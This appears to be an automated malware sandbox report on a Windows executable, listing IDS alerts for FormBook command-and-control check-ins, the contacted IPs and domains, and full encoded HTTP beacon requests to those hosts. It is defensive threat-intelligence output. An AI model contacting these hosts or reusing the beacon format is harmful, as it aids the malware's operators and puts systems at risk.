Source: http://www.askvtwv8.top/uztg/?G0L=GB6XqptpYp&ut1tI=+nnD4c3c3KEL/rpdey5PpuGEtusQHjNHKRoYtOqDasD0Qg1/WG/4NRhjA5miSBE9J8NC1pB0d1xeGfzelhsR1S3jYJp+47fQ47PDO4Kd95McmCWmHYCq+jA9bpNCOZRxRWyQ4ww=	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 4x nop then jmp 06465590h	0_2_064654D0
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 4x nop then jmp 06465590h	0_2_064654D8
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 4x nop then xor eax, eax	9_2_02479EC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 4x nop then mov ebx, 00000004h	9_2_02AB04E8

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49695 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49693 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49694 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49696 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49696 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49690 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49691 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49701 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49687 -> 148.72.247.70:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49687 -> 148.72.247.70:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49706 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49714 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49703 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49708 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49708 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49699 -> 149.104.184.89:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49710 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49718 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49711 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49712 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49712 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49697 -> 149.104.184.89:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49692 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49692 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49716 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49716 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49689 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49733 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49720 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49730 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49720 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49700 -> 149.104.184.89:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49700 -> 149.104.184.89:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49740 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49740 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49732 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49705 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49732 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49728 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49728 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49698 -> 149.104.184.89:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49713 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49729 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49717 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49721 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49707 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49702 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49709 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49704 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49704 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49719 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49736 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49736 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49737 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49715 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49724 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49724 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49725 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 144.76.229.203:80

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: 2Stejb80vJ.exe	Virustotal: Detection: 48%			Perma Link
Source: 2Stejb80vJ.exe	ReversingLabs: Detection: 68%

Source:	DNS query: www.melengkung.xyz
Source:	DNS query: www.berkilau.xyz
Source:	DNS query: www.seasay.xyz
Source:	DNS query: www.seasay.xyz
Source:	DNS query: www.seasay.xyz
Source:	DNS query: www.shibfestival.xyz
Source:	DNS query: www.031234103.xyz
Source:	DNS query: www.corsix.xyz
Source:	DNS query: www.dogebonus.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /2i0k/?G0L=GB6XqptpYp&ut1tI=WeJYadYniKRZByzzvxCLkkT/xti9VVMxwhfBQxnm132QdHMxzjTmB7Uw1lV55of2Ql4+U0VOq1+fhb57LzOydbzqbp/IZSD6gq9oPJFLXUDkZYj1AmTpf49c+0TtcAhO79gfZn4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rds845.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /wydt/?ut1tI=5VV5zaVyioKvui6f8qyG3IDGVPdlSdk2dL73T3ZYMn8k+e/vfjfehV3uAXE74CW6mr84kubQb7PqfuL3sByk4zAHSCf3WxUfTguS+kvnS9xqBSPOxgzlOh0MefbSUW4+G6if384=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.schoeler.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /uzd2/?ut1tI=fT9N3FsFDTNmTIZF4xptKfralz4kO9B+ENo/4lsaoo6HwYKpm4Najr2/W9Iv2vCiqIxfJAhVyMrxfUWcGsu8s4NcSddAFPEATdGR+1Krlc4bMxgLXUkZ9+4qwx2v0B27l+HM6E0=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kpilal.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /bl60/?ut1tI=7KqBeI51pekf0AVUSicAI1mJWWXcRARBaI0jAhY/A6pzh5mI8UIGMoQN96TYM7FYKU4GVIyckkKWvlHhgwmaAPr5PDKlfB0Nypg1LMgEB4DjXvFpXBtAkVFg1XxlfnTdf41yxLk=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zkkv3oae.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /m9bw/?G0L=GB6XqptpYp&ut1tI=c65Z66AH1nUgI224hybr4IHRoXEWVrV7RgpnxZMoMLGYnYeAoGqkN18+TNo8D4wVxrXfp68kmIM9xs3h0cs0qBmzaG/IJhDBE6KkOXv1fGCXK96Lmu+F1mhSNooUcKLPluRUpxM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.thrivell.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /cpbw/?ut1tI=j9x9kJU7UcAYEWEUt+89zuhJLorgOhrRwP39zrhC/EoZ+NnF04QyCgHeuwZnNkDy+Eh6VfeEAKF098oSI0wQVyoKCk+kNqeZ5J32c0Yn0TaV9onAGPkZAad5NAUzp9eQRGuVGi8=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sscexampyq.watchesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /0y3r/?G0L=GB6XqptpYp&ut1tI=NNsUrfDYogd5KgEmfHOhLiCUpL/ycyxUxiUVjETpADofQQCG23LbddXApMRWYwqNAPEF3q7toS5EuqqD+puOFUcCoZs2SjXBx6OKWylLgLNsG7+G8BBWhyCM6ST7exjkwRtD7v8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.melengkung.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /wbzo/?ut1tI=q3KlCKDmK4ELQKWWUcg/FlbQjxqr8Ug1u9jBPrpibm9/r1bZuSVNTJsKRKTfBrL1Q74mhVPLBmu2gNX7pDwWH1ZFwu0RuU1OqXQ55frXrQuy4zOufCIf2xZSmE4mBVnP4X7L4o8=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vvxcss.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /uztg/?G0L=GB6XqptpYp&ut1tI=+nnD4c3c3KEL/rpdey5PpuGEtusQHjNHKRoYtOqDasD0Qg1/WG/4NRhjA5miSBE9J8NC1pB0d1xeGfzelhsR1S3jYJp+47fQ47PDO4Kd95McmCWmHYCq+jA9bpNCOZRxRWyQ4ww= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.askvtwv8.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /0a6h/?ut1tI=4iO46mqIBVv4+k9W6LsUvCVaOUZDGEFnn7WAcz/P0eLSsJADjC1P1ze0v25FROBtMqAu0yYT6nFt/u3VwLGumvmxY2ZCttU2tqN3zj8iga/CXHm+gHUKrZMhfx8ALGtb6zfPvbA=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.berkilau.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /36xs/?G0L=GB6XqptpYp&ut1tI=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3rBomzgIOO7wigAI/htEgjf23cNUotiJq7H3GsdxzDVPbajzumommKHi90NSuQU+p/ERxGsu2ZmMOqrV9flKg0CCRQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.seasay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /gy4u/?ut1tI=LcvWm9PoXmh0ed+OrIDToYlIrZw2q35DEYIU6sknWZxapDsLCzJUOh5d+BBm/MfusN5GInj1wF1Jz1YJRWWIBTh6UJL8j/qwdkhQ8cf9NXR7wD6CkVng0KVakLL3T+jqTA6cIG0=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.shibfestival.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /z0it/?G0L=GB6XqptpYp&ut1tI=DaqYyDhfRyWIR4xS4E63/qTRIQgqoWSI9b+QdYveO98qQ64GTsQjKE9BhC2RGwgAmUZQI386DZwQTzGkc+2gVo8kGrmTzk6IQynrcBxHw5zDhLwaeX/sIAA/FuuaSbwjCsR/ynE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.031234103.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16
Source: global traffic	HTTP traffic detected: GET /vfs3/?ut1tI=KGtC6huJ4au9g2crOn4yKOveJg5tp2yoY9H48UkY9VT0CpunUoTAthUg4dvK3NVgO3OSivHm6ijFKYAZ8peYOGRBruj7bSpN0ILzuWa3aDCwm2BYeKRUnvFyJDHwcZleLFCIw3c=&G0L=GB6XqptpYp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.corsix.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16

Source: global traffic	DNS traffic detected: DNS query: www.rds845.shop
Source: global traffic	DNS traffic detected: DNS query: www.schoeler.pro
Source: global traffic	DNS traffic detected: DNS query: www.kpilal.info
Source: global traffic	DNS traffic detected: DNS query: www.zkkv3oae.vip
Source: global traffic	DNS traffic detected: DNS query: www.thrivell.life
Source: global traffic	DNS traffic detected: DNS query: www.sscexampyq.watches
Source: global traffic	DNS traffic detected: DNS query: www.melengkung.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vvxcss.info
Source: global traffic	DNS traffic detected: DNS query: www.askvtwv8.top
Source: global traffic	DNS traffic detected: DNS query: www.berkilau.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.shibfestival.xyz
Source: global traffic	DNS traffic detected: DNS query: www.031234103.xyz
Source: global traffic	DNS traffic detected: DNS query: www.corsix.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dogebonus.xyz

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2Stejb80vJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
2Stejb80vJ.exe